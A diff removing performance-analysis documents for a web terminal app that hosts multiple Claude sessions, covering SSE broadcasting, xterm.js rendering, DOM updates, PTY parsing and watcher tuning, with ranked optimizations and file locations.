||||
|
||||
---
|
||||
|
||||
## Impact Estimates
|
||||
|
||||
| # | Optimization | First Paint | TTI | Effort |
|
||||
|---|-------------|-------------|-----|--------|
|
||||
| 1.1 | mobile.css media query | -50ms | — | 1 min |
|
||||
| 1.2 | Remove duplicate fetch + double handleInit | — | -100-200ms | 15 min |
|
||||
| 1.3 | Deduplicate settings fetch | — | -50ms | 10 min |
|
||||
| 1.4 | Defer stats polling | — | -20ms | 10 min |
|
||||
| 1.5 | Preload xterm.css | -100-300ms | — | 5 min |
|
||||
| 1.6 | Fix stale version strings | cache correctness | — | 5 min |
|
||||
| 1.7 | Remove cases cache-bust | — | -10ms | 1 min |
|
||||
| 2.1 | Loading skeleton | perceived -500ms | — | 30 min |
|
||||
| 2.2 | Defer terminal init | -50-100ms | -50ms | 30 min |
|
||||
| 2.3 | Batch API endpoint | — | -100-200ms | 1 hr |
|
||||
| 2.4 | Lazy modals | -30-50ms parse | -50ms | 2-3 hrs |
|
||||
| 3.1 | Self-host xterm | -100-300ms | — | 20 min |
|
||||
| 3.2 | Minify JS/CSS | -50-100ms parse | — | 30 min |
|
||||
| 3.3 | Pre-compress assets | -10-30ms TTFB | — | 20 min |
|
||||
| 3.4 | Critical CSS inline | -200-400ms | — | 2 hrs |
|
||||
|
||||
**Combined estimate**: First paint **300-800ms faster**, TTI **200-500ms faster**.
|
||||
|
||||
---
|
||||
|
||||
## Implementation Order (for implementation agent)
|
||||
|
||||
Do these in order — each step is independently testable:
|
||||
|
||||
1. **1.1** — mobile.css media query (1 line, instant win)
|
||||
2. **1.5** — Preload xterm.css (2 lines, big render-blocking fix)
|
||||
3. **1.2** — Remove duplicate `/api/status` + double handleInit
|
||||
4. **1.3** — Deduplicate `/api/settings` fetch
|
||||
5. **1.7** — Remove cache-busting from `/api/cases`
|
||||
6. **3.1** — Self-host xterm.js (removes CDN dependency entirely)
|
||||
7. **3.2** — Add esbuild minification to build
|
||||
8. **1.4** — Defer stats polling
|
||||
9. **1.6** — Fix stale version strings in COM workflow
|
||||
10. **2.1** — Loading skeleton
|
||||
11. **2.2** — Defer terminal init after first paint
|
||||
12. **2.3** — Batch init API endpoint
|
||||
13. **2.4** — Lazy modals (biggest refactor, do last)
|
||||
14. **3.3** — Pre-compress assets (nice-to-have)
|
||||
15. **3.4** — Critical CSS extraction (only if still needed after above)
|
||||
|
||||
**Verification after each step**: Use Playwright to load the page with `waitUntil: 'domcontentloaded'`, measure first paint timing, check that the UI renders correctly with 3-4s wait for async data.
|
||||
@@ -1,423 +0,0 @@
|
||||
# Performance Analysis & Optimization Opportunities
|
||||
|
||||
**Date**: 2026-03-07
|
||||
**Scope**: Full-stack performance analysis — backend PTY handling, SSE broadcasting, frontend terminal rendering, local echo overlay, DOM updates, config/scaling limits.
|
||||
**Constraint**: All recommendations preserve existing functionality including local echo, backpressure, anti-flicker pipeline, and mobile support.
|
||||
|
||||
---
|
||||
|
||||
## Executive Summary
|
||||
|
||||
The codebase is already well-optimized in critical paths. The multi-layer backpressure system, adaptive terminal batching, DEC 2026 sync markers, and incremental state serialization are strong. The main opportunities are in **reducing unnecessary work** (SSE filtering, DOM rebuilds, lazy terminal init) rather than algorithmic changes.
|
||||
|
||||
**Top 5 high-impact opportunities:**
|
||||
|
||||
| # | Optimization | Impact | Risk | Effort |
|
||||
|---|-------------|--------|------|--------|
|
||||
| 1 | Session-scoped SSE subscriptions | Bandwidth -60-80%, CPU -40% | Medium | Medium |
|
||||
| 2 | Lazy xterm.js for minimized subagent windows | Memory -3.5MB at 50 agents | Low | Low |
|
||||
| 3 | Targeted badge update (skip full tab rebuild) | Eliminates O(n) reflow on badge change | Low | Low |
|
||||
| 4 | Conditional SSE padding (tunnel-only, terminal-only) | Bandwidth -70% when tunneled | Low | Low |
|
||||
| 5 | Canvas renderer on mobile | GPU pressure reduction, battery savings | Low | Low |
|
||||
|
||||
---
|
||||
|
||||
## 1. SSE Broadcasting
|
||||
|
||||
### Current State
|
||||
- **92 event types** broadcast to all connected clients (max 100)
|
||||
- Single `JSON.stringify()` per event, shared across all clients (efficient)
|
||||
- **No per-client filtering** — every client receives every event regardless of which session they're viewing
|
||||
- 8KB padding appended to **every** event when tunnel is active (forces Cloudflare proxy flush)
|
||||
- Backpressure: clients marked as backpressured if `reply.raw.write()` returns false; recovery via `session:needsRefresh`
|
||||
|
||||
### Bottlenecks
|
||||
|
||||
**B1: No session-scoped SSE subscriptions** (`server.ts:1986`)
|
||||
- Client viewing session A still receives all events for sessions B through T
|
||||
- With 20 active sessions, ~95% of terminal events are irrelevant to any given client
|
||||
- Cost: wasted bandwidth, CPU for JSON parsing, and event handler dispatch on client
|
||||
|
||||
**B2: Unconditional 8KB padding** (`server.ts:1977`)
|
||||
- Every event gets 8KB comment padding when tunnel is active
|
||||
- A `task:updated` event (~200 bytes payload) becomes ~8.2KB
|
||||
- High-frequency events like `session:terminal` need the padding; low-frequency events like `session:created` don't
|
||||
|
||||
### Recommendations
|
||||
|
||||
**R1: Session-scoped SSE subscriptions** (High impact)
|
||||
- Add `?sessions=id1,id2` query param to `/api/events` SSE endpoint
|
||||
- Server filters events by session ID before broadcasting
|
||||
- Client subscribes to active session + "global" events (session lifecycle, system)
|
||||
- Re-subscribes on tab switch (or subscribe to all with client-side filter as fallback)
|
||||
- **Savings**: ~80% bandwidth reduction for single-session viewers; ~60% for multi-session dashboards
|
||||
|
||||
**R2: Tiered SSE padding** (Medium impact)
|
||||
- Only pad `session:terminal` events and SSE heartbeats (the two that need proxy flush)
|
||||
- Skip padding for low-frequency structural events (`session:created`, `task:updated`, etc.)
|
||||
- **Savings**: ~70% padding overhead reduction; terminal events already large enough to flush
|
||||
|
||||
---
|
||||
|
||||
## 2. Terminal Rendering
|
||||
|
||||
### Current State (Well-Optimized)
|
||||
- **6-layer anti-flicker pipeline**: Server batching (adaptive 16-50ms) → DEC 2026 sync wrap → single JSON serialize → client rAF batching → sync segment parser → chunked buffer loading (32KB/frame)
|
||||
- **64KB/frame write budget** with DEC 2026 sync-segment awareness (prevents 141KB single-frame freezes)
|
||||
- **3-layer backpressure**: SSE cap (128KB queued → drop + refresh), frame budget (64KB/frame), chunked restore (32KB/frame)
|
||||
- WebGL renderer enabled by default with canvas fallback on context loss
|
||||
- Typical latency: 16-32ms; worst case: ~115ms (50ms server batch + 50ms sync wait + 16ms rAF)
|
||||
|
||||
### Bottlenecks
|
||||
|
||||
**B3: WebGL on mobile** (`app.js:627-637`)
|
||||
- Mobile GPUs are weaker; WebGL context loss more likely on low-end devices
|
||||
- Canvas renderer is sufficient for mobile (typically 1 session, smaller viewport)
|
||||
|
||||
**B4: Static scrollback for all sessions** (`app.js:572`)
|
||||
- Default 5000 lines scrollback for all sessions regardless of activity level
|
||||
- Heavy output sessions (build logs, test runners) accumulate large scroll buffers
|
||||
|
||||
**B5: No addon lazy loading**
|
||||
- FitAddon, Unicode11Addon, and WebGLAddon all loaded at terminal init
|
||||
- Unicode11Addon only needed for CJK content; WebGLAddon is large
|
||||
|
||||
### Recommendations
|
||||
|
||||
**R3: Force canvas renderer on mobile** (Low risk)
|
||||
- Detect `MobileDetection.isMobile()` and skip WebGL addon loading
|
||||
- Reduces GPU memory pressure, prevents context loss crashes
|
||||
- Mobile typically has 1-2 sessions — canvas performance is more than adequate
|
||||
|
||||
**R4: Dynamic scrollback based on session activity** (Low risk)
|
||||
- Active sessions (working state): 5000 lines (current default)
|
||||
- Inactive/idle sessions: reduce to 2000 lines
|
||||
- Restore on session select (fetch from server buffer)
|
||||
- **Savings**: ~60% scrollback memory for idle sessions
|
||||
|
||||
**R5: Lazy-load Unicode11Addon** (Low risk)
|
||||
- Only load when CJK content is detected in terminal output
|
||||
- Detection: check for characters in CJK Unicode ranges during ANSI stripping (already iterating)
|
||||
- Most sessions never need it
|
||||
|
||||
---
|
||||
|
||||
## 3. DOM & Session Tab Rendering
|
||||
|
||||
### Current State
|
||||
- Session tabs use **intelligent incremental updates** with debounced 100ms rendering
|
||||
- Incremental path: only updates changed properties (classes, textContent, badges) when session list is stable
|
||||
- Full rebuild path: triggered when sessions added/removed **or badge count changes**
|
||||
- Subagent windows: per-window xterm.js instances, even when minimized
|
||||
|
||||
### Bottlenecks
|
||||
|
||||
**B6: Badge count change triggers full tab rebuild** (`app.js:3207-3209`)
|
||||
- A single subagent badge increment on one tab triggers `_fullRenderSessionTabs()` — rebuilds entire sidebar HTML via `innerHTML =`
|
||||
- With 20 sessions, this is an O(n) reflow for a single badge number change
|
||||
- Badge changes are frequent during active subagent work
|
||||
|
||||
**B7: Minimized subagent windows retain xterm.js instances** (`subagent-windows.js`)
|
||||
- 50 subagent windows × ~75KB per xterm.js instance = ~3.75MB DOM memory
|
||||
- Minimized windows are invisible but their terminals remain in DOM
|
||||
- xterm.js instances continue processing resize events even when hidden
|
||||
|
||||
**B8: `backdrop-filter: blur()` on overlays** (`styles.css:2246-2247, 3098`)
|
||||
- Forces new stacking context, disables browser compositing optimizations
|
||||
- 50-100ms layout thrashing on modal open/close
|
||||
- Only 2 uses, but they're on frequently toggled overlays
|
||||
|
||||
### Recommendations
|
||||
|
||||
**R6: Targeted badge update without full rebuild** (Low risk)
|
||||
- When badge count changes but session list is stable, update only the badge `<span>` textContent
|
||||
- Keep incremental path for badge changes; only use full rebuild for structural changes (add/remove sessions)
|
||||
- **Savings**: Eliminates O(n) reflow per badge change; reduces to O(1) targeted update
|
||||
|
||||
**R7: Lazy xterm.js initialization for subagent windows** (Medium impact)
|
||||
- Only create xterm.js Terminal instance when window is restored/maximized
|
||||
- On minimize: serialize terminal buffer, dispose Terminal instance, keep buffer in memory
|
||||
- On restore: create new Terminal, write buffer back
|
||||
- **Savings**: ~3.5MB DOM reduction at 50 minimized agents; eliminates hidden resize processing
|
||||
- **Trade-off**: ~200-500ms restore delay (buffer write), mitigated by chunked loading
|
||||
|
||||
**R8: Replace `backdrop-filter: blur()` with `background: rgba()`** (Low risk)
|
||||
- Use semi-transparent background instead of blur effect
|
||||
- Or use `will-change: transform` hint if blur is kept
|
||||
- **Savings**: Eliminates forced recomposition layer; 50-100ms faster overlay open
|
||||
|
||||
---
|
||||
|
||||
## 4. Backend PTY & State Management
|
||||
|
||||
### Current State (Excellent)
|
||||
- **BufferAccumulator**: Array-based chunking with lazy join on read — avoids O(n) string concatenation
|
||||
- **ANSI stripping**: Throttled at 150ms intervals with lazy evaluation (not per-chunk)
|
||||
- **State persistence**: 500ms debounce + incremental JSON caching per session (only dirty sessions re-serialized)
|
||||
- **Expensive parsers**: Throttled to 150ms window, accumulated data capped at 64KB
|
||||
- **Memory**: All buffers have hard limits (2MB terminal, 1MB text, 1000 messages, 64KB line buffer)
|
||||
|
||||
### Bottlenecks
|
||||
|
||||
**B9: Pending clean data cap at 64KB** (`session.ts:1097-1133`)
|
||||
- Between 150ms processing windows, raw PTY data accumulates in `_pendingCleanData`
|
||||
- Capped at 64KB — excess data rolls off (old data discarded)
|
||||
- During heavy output (large build logs), this means parsers may miss content
|
||||
- Acceptable trade-off for performance, but worth documenting
|
||||
|
||||
**B10: `LRUMap.delete()` is O(n) worst case** (`utils/lru-map.ts:137-138`)
|
||||
- When deleting the newest entry, iterates all keys to find new newest
|
||||
- Rare in practice (delete is uncommon; set/get are hot paths)
|
||||
- Could matter during mass cleanup of 500 agents
|
||||
|
||||
### Recommendations
|
||||
|
||||
**R9: Consider adaptive pending data cap** (Low priority)
|
||||
- During idle detection (critical to get right), increase cap to 128KB
|
||||
- During active working state, keep at 64KB (parsers less critical)
|
||||
- **Benefit**: More accurate idle detection during heavy output
|
||||
|
||||
**R10: Track second-newest in LRUMap** (Low priority)
|
||||
- Maintain a `_secondNewestKey` alongside `_newestKey`
|
||||
- On delete of newest, promote second-newest without iteration
|
||||
- Only matters at scale (500+ agents with frequent eviction)
|
||||
|
||||
---
|
||||
|
||||
## 5. Local Echo & Input Path
|
||||
|
||||
### Current State (Well-Designed)
|
||||
- **DOM overlay approach** — `<span>` elements in `.xterm-screen` at z-index 7, completely independent of `terminal.write()`
|
||||
- **Render caching**: `_lastRenderKey` includes text, position, column offsets — skips redundant re-renders
|
||||
- **Input flow**: Char accumulation → Enter triggers flush → 80ms delay before `\r` (ensures text reaches PTY first)
|
||||
- **Tab completion**: Baseline snapshot → detect buffer change → 300ms fallback timer
|
||||
- **CJK support**: Per-character width detection with `terminal.unicode.getStringCellWidth()` preferred, manual fallback
|
||||
- **Prompt detection**: Bottom-up line scan, O(rows) — cached position, column-lock prevents jitter
|
||||
|
||||
### Bottlenecks
|
||||
|
||||
**B11: tmux send-keys latency** (~50-100ms per input)
|
||||
- Each `writeViaMux()` spawns a child process (`tmux send-keys`)
|
||||
- Text and Enter sent separately with 50ms delay between
|
||||
- For rapid typing: characters batch before Enter, so overhead is per-command not per-keystroke
|
||||
- **Acceptable trade-off** for session persistence (tmux survives server restarts)
|
||||
|
||||
**B12: 80ms delay between text flush and Enter** (`app.js:872-875`)
|
||||
- Intentional: ensures text reaches PTY before Enter, preventing Ink from processing empty input
|
||||
- Adds 80ms to perceived Enter-to-response latency
|
||||
- Could potentially be reduced with acknowledgment-based approach
|
||||
|
||||
**B13: Scroll listener on terminal viewport** (`zerolag-input-addon.ts:139`)
|
||||
- 50ms debounced re-render on scroll — acceptable but fires frequently during heavy output
|
||||
- Overlay hidden when scrolled up (correct behavior), shown when at bottom
|
||||
|
||||
### Recommendations
|
||||
|
||||
**R11: Reduce Enter delay from 80ms to 50ms** (Low risk, test carefully)
|
||||
- The tmux `send-keys` already has 50ms internal delay
|
||||
- Combined with network latency, 80ms client-side may be excessive
|
||||
- Test with Ink-heavy sessions (Claude Code's status bar) — if text arrives before Enter at 50ms, reduce
|
||||
- **Savings**: 30ms perceived latency reduction per command
|
||||
|
||||
**R12: Batch tmux send-keys via stdin pipe** (Medium effort, high impact for rapid input)
|
||||
- Instead of spawning `tmux send-keys` per input, maintain a persistent connection
|
||||
- Use `tmux -C` (control mode) for programmatic interaction without child process spawning
|
||||
- **Savings**: Eliminate ~50-100ms process spawn overhead per input
|
||||
- **Risk**: Control mode has different semantics; needs careful testing with session persistence
|
||||
|
||||
**R13: Skip overlay re-render during heavy output scroll** (Low risk)
|
||||
- When terminal is receiving >10KB/s output, hide overlay entirely (user isn't typing during heavy output)
|
||||
- Re-show overlay after 500ms of output silence
|
||||
- **Savings**: Eliminates unnecessary DOM overlay re-renders during build logs / test output
|
||||
|
||||
---
|
||||
|
||||
## 6. Polling & File Watchers
|
||||
|
||||
### Current State
|
||||
- **SubagentWatcher**: 1s base poll, full scan throttled to every 5s, fs.watch() on known directories
|
||||
- **TranscriptWatcher**: 1 per session, fs.watch() primary with 1s poll fallback
|
||||
- **ImageWatcher**: chokidar per session with 100ms stability poll, burst limit 20/10s
|
||||
- **TeamWatcher**: chokidar primary with 30s poll fallback, LRU caches (50 teams, 200 tasks)
|
||||
- **RalphTracker**: Todo cleanup every 5 minutes
|
||||
|
||||
### Scaling Profile (20 sessions)
|
||||
| Component | Instances | Frequency | Total ops/sec |
|
||||
|-----------|-----------|-----------|---------------|
|
||||
| SubagentWatcher | 1 (global) | Full scan every 5s | 0.2/s |
|
||||
| TranscriptWatcher | 20 | 1s poll (fallback) | 20/s max |
|
||||
| ImageWatcher | 20 | 100ms poll (during writes only) | 200/s burst |
|
||||
| TeamWatcher | 1 (global) | 30s poll (fallback) | 0.03/s |
|
||||
| SSE heartbeat | 1 (global) | 15s | 0.07/s |
|
||||
| SSE dead client check | 1 (global) | 30s | 0.03/s |
|
||||
| Mux stats collection | 1 (global) | 2s | 0.5/s |
|
||||
| **Total steady-state** | | | **~21/s** |
|
||||
|
||||
### Recommendations
|
||||
|
||||
**R14: Increase TranscriptWatcher poll interval to 2s** (Low risk)
|
||||
- Transcript changes are infrequent (new messages every few seconds at most)
|
||||
- fs.watch() is the primary mechanism; polling is fallback
|
||||
- **Savings**: Halves fallback filesystem checks (20/s → 10/s for 20 sessions)
|
||||
|
||||
**R15: Share chokidar instances for co-located session directories** (Medium effort)
|
||||
- Sessions in the same parent directory could share a single chokidar watcher with depth:3
|
||||
- Common case: multiple sessions in `~/projects/foo/` — one watcher covers all
|
||||
- **Savings**: Reduce chokidar instances from 20 to ~5-10 for typical workloads
|
||||
|
||||
---
|
||||
|
||||
## 7. Frontend Asset Delivery
|
||||
|
||||
### Current State
|
||||
- **app.js**: 12,027 lines (source) → esbuild minified → gzip/brotli compressed (~30-40KB gzipped)
|
||||
- **Static caching**: `maxAge: '1y'` via `@fastify/static`
|
||||
- **Service worker**: Push notification handler only — no asset caching
|
||||
- **No code splitting**: Single monolithic app.js bundle
|
||||
|
||||
### Bottlenecks
|
||||
|
||||
**B14: No cache-busting mechanism**
|
||||
- `maxAge: '1y'` means browsers cache aggressively
|
||||
- After deployment, users need `Ctrl+Shift+R` to see updates
|
||||
- No content hash in filenames or ETags for automatic invalidation
|
||||
|
||||
**B15: Monolithic app.js**
|
||||
- All 12K lines loaded on initial page load regardless of which features are used
|
||||
- Ralph wizard, plan orchestrator UI, team management — all loaded upfront
|
||||
- Mobile loads the same bundle as desktop
|
||||
|
||||
### Recommendations
|
||||
|
||||
**R16: Add content hash to asset filenames** (Medium impact)
|
||||
- Build step: rename `app.js` → `app.[hash].js`
|
||||
- Generate a manifest or inject hash into HTML template
|
||||
- Keep `maxAge: '1y'` — cache invalidation happens via filename change
|
||||
- **Savings**: Eliminates stale cache issues after deployment; removes need for manual hard refresh
|
||||
|
||||
**R17: Code-split app.js into core + feature modules** (High effort, medium impact)
|
||||
- Core (~4K lines): terminal, SSE, session management, tabs, input handling
|
||||
- Deferred (~8K lines): Ralph wizard, plan UI, team management, subagent windows, image viewer
|
||||
- Load deferred modules on first use via dynamic `import()` or lazy `<script>` injection
|
||||
- **Savings**: ~60% reduction in initial load size; faster time-to-interactive
|
||||
- **Risk**: Complexity increase; need to handle loading states for deferred features
|
||||
- **Note**: May not be worth the effort given the app is already gzipped to ~30-40KB
|
||||
|
||||
---
|
||||
|
||||
## 8. CSS Performance
|
||||
|
||||
### Current State
|
||||
- **styles.css**: 7,153 lines with ~45 box-shadow uses, 2 backdrop-filter uses
|
||||
- Animations: GPU-accelerated keyframes for pulsing alerts, loading spinners
|
||||
- Z-index layering: well-organized (subagent 1000, plan 1100, log 2000, image 3000, overlay 7)
|
||||
|
||||
### Recommendations
|
||||
|
||||
**R18: Replace backdrop-filter with opaque overlay** (Low risk, covered in R8)
|
||||
|
||||
**R19: Use `contain: content` on subagent windows** (Low risk)
|
||||
- Add CSS containment to subagent window containers
|
||||
- Prevents layout changes inside windows from triggering reflow on parent
|
||||
- Especially valuable with 50 windows: changes in one window won't invalidate others
|
||||
- ```css
|
||||
.subagent-window { contain: content; }
|
||||
```
|
||||
- **Savings**: Reduces layout recalculation scope from global to per-window
|
||||
|
||||
**R20: Use `content-visibility: auto` on off-screen subagent windows** (Low risk)
|
||||
- Browser skips rendering of off-screen windows entirely
|
||||
- Combined with `contain-intrinsic-size` to prevent layout shift
|
||||
- ```css
|
||||
.subagent-window.minimized { content-visibility: hidden; }
|
||||
```
|
||||
- **Savings**: Browser skips paint/layout for minimized windows; complements R7
|
||||
|
||||
---
|
||||
|
||||
## 9. Memory & Scaling Limits
|
||||
|
||||
### Current Budget (20 sessions)
|
||||
| Component | Per Session | Total | Status |
|
||||
|-----------|-----------|-------|--------|
|
||||
| Terminal buffer | 2MB | 40MB | Hard-limited, auto-trim |
|
||||
| Text output | 1MB | 20MB | Hard-limited, auto-trim |
|
||||
| Messages | ~1MB | 20MB | Capped at 1000, trims to 800 |
|
||||
| Respawn buffer | 1MB | 20MB | Hard-limited |
|
||||
| **Buffers total** | | **100MB** | Acceptable |
|
||||
| TranscriptWatcher | ~100KB | 2MB | |
|
||||
| ImageWatcher | ~50KB | 1MB | |
|
||||
| SubagentWatcher | ~500KB | 500KB | Global |
|
||||
| Frontend terminal cache | ~256KB | 5MB | LRU, max 20 entries |
|
||||
| **Total estimated** | | **~110MB** | Comfortable |
|
||||
|
||||
### At Max Scale (50 sessions)
|
||||
- Buffers: ~250MB
|
||||
- Watchers: ~5MB
|
||||
- **Total: ~255MB** + Node.js overhead — acceptable on modern hardware
|
||||
|
||||
### Potential Leak Vectors (All Mitigated)
|
||||
- `_shortIdCache` in server — unbounded Map, but entries are tiny (string→string); grows at O(sessions created), not O(events)
|
||||
- All CleanupManager-registered resources tracked and disposed on session stop
|
||||
- `isStopped` guard prevents new timers after session cleanup
|
||||
|
||||
---
|
||||
|
||||
## 10. Implementation Priority Matrix
|
||||
|
||||
### Phase 1 — Quick Wins (1-2 hours each, low risk)
|
||||
| # | Optimization | Files to Change |
|
||||
|---|-------------|-----------------|
|
||||
| R6 | Targeted badge update | `app.js` (3207-3209) |
|
||||
| R3 | Canvas renderer on mobile | `app.js` (627-637) |
|
||||
| R8 | Replace backdrop-filter blur | `styles.css` (2246, 3098) |
|
||||
| R19 | CSS containment on subagent windows | `styles.css` |
|
||||
| R20 | `content-visibility: hidden` on minimized windows | `styles.css` |
|
||||
|
||||
### Phase 2 — Medium Effort (half-day each)
|
||||
| # | Optimization | Files to Change |
|
||||
|---|-------------|-----------------|
|
||||
| R2 | Tiered SSE padding | `server.ts` (broadcast function) |
|
||||
| R7 | Lazy xterm.js for minimized subagents | `subagent-windows.js` |
|
||||
| R11 | Reduce Enter delay to 50ms | `app.js` (872-875), test with Ink |
|
||||
| R14 | TranscriptWatcher 2s poll | `transcript-watcher.ts` |
|
||||
| R16 | Content-hash asset filenames | `build.mjs`, `server.ts` |
|
||||
|
||||
### Phase 3 — Larger Initiatives (1-2 days each)
|
||||
| # | Optimization | Files to Change |
|
||||
|---|-------------|-----------------|
|
||||
| R1 | Session-scoped SSE subscriptions | `server.ts`, `app.js` (SSE connect) |
|
||||
| R5 | Lazy Unicode11Addon loading | `app.js`, build pipeline |
|
||||
| R12 | Persistent tmux control mode | `tmux-manager.ts` |
|
||||
| R17 | Code-split app.js | `app.js`, `build.mjs`, HTML template |
|
||||
|
||||
### Not Recommended (Low ROI or High Risk)
|
||||
| # | Why Not |
|
||||
|---|---------|
|
||||
| R4 | Dynamic scrollback adds complexity; memory savings marginal vs total budget |
|
||||
| R9 | Adaptive pending data cap adds state; current 64KB cap rarely matters |
|
||||
| R10 | LRUMap.delete() O(n) is theoretical; never triggered at current scale |
|
||||
| R15 | Shared chokidar instances add directory-matching complexity for minimal gain |
|
||||
|
||||
---
|
||||
|
||||
## Appendix: Key File Locations
|
||||
|
||||
| Area | File | Key Lines |
|
||||
|------|------|-----------|
|
||||
| SSE broadcast | `src/web/server.ts` | 1961-1989 (broadcast), 1934-1959 (backpressure) |
|
||||
| Terminal batching | `src/web/server.ts` | 1994-2048 (per-session adaptive batching) |
|
||||
| Frame budget | `src/web/public/app.js` | 1370-1478 (flushPendingWrites, 64KB cap) |
|
||||
| Flicker filter | `src/web/public/app.js` | 1176-1255 (50ms sync wait, 256KB safety) |
|
||||
| Tab rendering | `src/web/public/app.js` | 3108-3357 (incremental + full rebuild) |
|
||||
| Tab switching | `src/web/public/app.js` | 3560-3760 (cache + chunked load + deferred UI) |
|
||||
| Local echo | `packages/xterm-zerolag-input/src/` | All files (overlay, prompt, CJK) |
|
||||
| Local echo integration | `src/web/public/app.js` | 640, 815-988 (input flow) |
|
||||
| Subagent windows | `src/web/public/subagent-windows.js` | Full file (window mgmt, drag, minimize) |
|
||||
| State persistence | `src/state-store.ts` | 161-250 (debounced save, incremental JSON) |
|
||||
| Buffer accumulator | `src/utils/buffer-accumulator.ts` | Full file (array chunks, lazy join) |
|
||||
| PTY handling | `src/session.ts` | 1046-1133 (data flow), 1173-1230 (parsing) |
|
||||
| Config limits | `src/config/` | 9 files (buffer, map, timing, auth, etc.) |
|
||||
| Anti-flicker docs | `docs/terminal-anti-flicker.md` | Architecture reference |
|
||||
| CSS | `src/web/public/styles.css` | 2246 (backdrop-filter), full file |
|
||||
| Build pipeline | `scripts/build.mjs` | 59-68 (minify + compress) |
|
||||
@@ -1,266 +0,0 @@
|
||||
# Codeman Performance Investigation Report
|
||||
|
||||
**Date**: 2026-02-20
|
||||
**Scope**: Why Codeman feels sluggish when multiple Claude tabs are very busy
|
||||
**Method**: 4-agent parallel analysis of server, PTY pipeline, frontend, and background systems
|
||||
|
||||
---
|
||||
|
||||
## Executive Summary
|
||||
|
||||
When multiple Claude sessions are actively producing heavy terminal output (e.g., building, writing files, running tests), Codeman's UI becomes sluggish. This investigation identified **14 bottlenecks** across 4 layers of the stack. The root cause is **cumulative event loop blocking** — no single operation is catastrophically slow, but dozens of small synchronous operations run on every PTY data chunk, and with N busy sessions producing chunks every few milliseconds, the event loop gets saturated.
|
||||
|
||||
The most impactful findings are ranked by severity below.
|
||||
|
||||
---
|
||||
|
||||
## Critical Findings (Event Loop Blockers)
|
||||
|
||||
### 1. PTY Data Handler Chain — O(output_volume) per session, synchronous
|
||||
**File**: `src/session.ts:986-1086`
|
||||
**Severity**: CRITICAL
|
||||
|
||||
Every chunk of PTY output from a busy Claude session runs through this synchronous chain on the Node.js event loop:
|
||||
|
||||
```
|
||||
PTY onData → ANSI strip regex → ralph-tracker → bash-tool-parser →
|
||||
token parser → CLI info parser → task description parser →
|
||||
idle/working detection → emit('terminal') → emit('output')
|
||||
```
|
||||
|
||||
**Key costs per chunk:**
|
||||
- `ANSI_ESCAPE_PATTERN_FULL` regex (line 999): Complex regex with alternation, runs on every chunk where any consumer needs clean data
|
||||
- `ralphTracker.processCleanData()` (line 1014): Splits into lines, runs regex per line, checks multi-line patterns
|
||||
- `bashToolParser.processCleanData()` (line 1020): Similar line-by-line regex processing
|
||||
- `parseTaskDescriptionsFromTerminalData()` (line 1038): Regex scan for parenthesized descriptions
|
||||
- Working/idle detection (lines 1043-1085): Multiple `includes()` checks plus `getCleanData()` calls
|
||||
|
||||
**The lazy `getCleanData()` pattern (line 997-1002)** was a good optimization — it avoids ANSI stripping when no consumer needs it. But when Ralph tracking is enabled (common during active work), `getCleanData()` is called on every chunk, negating the optimization.
|
||||
|
||||
**With 5 busy sessions** producing 50+ chunks/second each, this means 250+ synchronous processing chains per second on the event loop. Each chain involves string allocation, regex matching, and line splitting.
|
||||
|
||||
### 2. Broadcast Serialization — JSON.stringify on every flush
|
||||
**File**: `src/web/server.ts:4941-4967`
|
||||
**Severity**: CRITICAL
|
||||
|
||||
The `broadcast()` method calls `JSON.stringify(data)` synchronously for every event. Terminal data is the highest-frequency event. During `flushTerminalBatches()` (line 5030), broadcast is called once per session with pending data. With 10 busy sessions flushing every 16-50ms, that's 200-625 `JSON.stringify` calls per second on terminal data alone.
|
||||
|
||||
The terminal data payload is a string that gets double-encoded: the raw terminal string is embedded inside a JSON object `{id, data}`, then that object is JSON.stringify'd. For large chunks (up to 32KB per the `BATCH_FLUSH_THRESHOLD`), this creates significant garbage collection pressure.
|
||||
|
||||
**Additionally**, the `session:updated` broadcast includes `toLightDetailedState()` which serializes `taskTree`, `tokens`, `bufferStats`, and `respawnConfig` — this is called on many state changes, not just terminal data.
|
||||
|
||||
### 3. Single-Timer Batching — All sessions share one setTimeout
|
||||
**File**: `src/web/server.ts:5017-5027`
|
||||
**Severity**: HIGH
|
||||
|
||||
The `batchTerminalData()` method uses a **single shared timer** (`this.terminalBatchTimer`) for all sessions. When the timer fires, `flushTerminalBatches()` iterates ALL pending sessions and broadcasts each one. This means:
|
||||
|
||||
- One extremely busy session's rapid data can force the timer to fire at the minimum interval (16ms), flushing ALL sessions at that rate
|
||||
- The flush itself iterates all pending sessions synchronously
|
||||
- The `_minBatchInterval` optimization (line 5003) means the fastest session dictates the timer for everyone
|
||||
|
||||
This creates a **thundering herd** effect: all session flushes happen in a single synchronous burst rather than being staggered.
|
||||
|
||||
### 4. State Persistence Storms
|
||||
**File**: `src/web/server.ts:3879-3917`
|
||||
**Severity**: HIGH
|
||||
|
||||
`persistSessionState()` is called from **28+ locations** in server.ts. Each call sets a 100ms debounce timer per session. During heavy activity, this means:
|
||||
|
||||
- Frequent timer creation/cancellation (GC pressure)
|
||||
- The actual persist (`_persistSessionStateNow`) calls `session.toState()` which creates a new object, then `store.setSession()` which triggers `JSON.stringify` of the entire state store and `writeFileSync` to disk
|
||||
|
||||
The `StateStore` (via `state-store.ts`) debounces its own write, but the overhead is in the per-session `toState()` serialization and object creation, not just the disk write.
|
||||
|
||||
---
|
||||
|
||||
## High-Severity Findings
|
||||
|
||||
### 5. Ralph Tracker Line Processing — O(lines) per chunk
|
||||
**File**: `src/ralph-tracker.ts:1337-1375`
|
||||
**Severity**: HIGH (when Ralph tracking is enabled)
|
||||
|
||||
When enabled, `processCleanData()`:
|
||||
1. Appends to a line buffer (string concatenation)
|
||||
2. Splits on `\n` (creates array)
|
||||
3. Calls `processLine()` on each line (regex matching per line)
|
||||
4. Calls `checkMultiLinePatterns()` (additional regex on full chunk)
|
||||
5. Calls `maybeCleanupExpiredTodos()` (iterates todos Map)
|
||||
|
||||
For a busy session producing 100+ lines/second, this is significant. The line buffer can grow up to `MAX_LINE_BUFFER_SIZE` before being truncated, and the split/iterate pattern creates garbage on every chunk.
|
||||
|
||||
### 6. Subagent Watcher Polling — O(agents) every 1-10 seconds
|
||||
**File**: `src/subagent-watcher.ts:225-274`
|
||||
**Severity**: MEDIUM-HIGH
|
||||
|
||||
Three periodic operations:
|
||||
- **Poll interval** (1s): Lightweight check, but full directory scan every 5th poll (5s)
|
||||
- **Liveness check** (10s): Runs `pgrep` (child process spawn), then iterates ALL tracked agents to check if alive. With 50+ subagents (common with agent teams), this is a non-trivial burst.
|
||||
